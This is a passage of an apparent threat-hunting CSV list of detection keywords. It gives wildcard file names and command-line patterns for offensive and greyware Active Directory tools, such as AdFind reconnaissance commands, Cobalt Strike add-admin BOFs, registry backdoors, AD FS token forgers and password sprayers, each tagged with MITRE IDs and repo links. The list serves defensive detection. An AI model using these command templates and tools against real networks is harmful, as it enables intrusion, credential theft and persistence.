post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*","greyware_tool_keyword","powershell","allows all users to access all computers with a specified configuration","T1053","TA0003","N/A","N/A","Persistence","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*Add-RegBackdoor.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Add-RemoteRegBackdoor*","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Add-RemoteRegBackdoor*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*addresshunter.h*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Add-ServiceDacl *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Add-ServiceDacl*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*addspn.py -u * -p * -t * -s * --additional *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*addspn.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*AddUser-Bof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*AddUser-Bof.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*AddUser-Bof.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*AddUser-Bof.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*AddUser-Bof.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*AddUserImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*AddUserToDomainGroup *Domain Admins*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","0","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*AddUserToDomainGroup.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*AddUserToDomainGroup.cna*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*adexplorer.exe*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*adexplorer.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*adexplorer.zip*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*adexplorer64.exe*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*adexplorer64a.exe*","greyware_tool_keyword","adexplorer","Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors","T1003.001 - T1087.001","TA0006 - TA0007","N/A","N/A","AD Enumeration","https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ADExplorerSnapshot.py*","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","7","680","90","2023-08-24T11:58:03Z","2021-12-22T14:42:23Z" +"*ADExplorerSnapshot.py.git*","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","7","680","90","2023-08-24T11:58:03Z","2021-12-22T14:42:23Z" +"*adfind -f *","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind -f objectclass=trusteddomain*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind -sc trustdmp*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.bat*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -f (objectcategory=person) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -f *(objectcategory=group)* > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -f objectcategory=computer > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -f objectclass=trusteddomain*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -gcb -sc trustdmp > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*","offensive_tool_keyword","POC","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*adfind.exe -sc trustdmp*","greyware_tool_keyword","adfind","query domain trusts with adfind","T1482 - T1018","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1548 T1134 T1078 T1078.002","TA0004","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*adfind.exe*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*AdFind.zip*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://www.joeware.net/freetools/tools/adfind/usage.htm","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ADFSDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADFSpoof.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ADFSpoof-master*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"*ADFSpray.csv*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*adfspray.git*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*ADFSpray.py*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*ADHunt-main.zip*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*adidnsdump -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*adidnsdump*","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Information 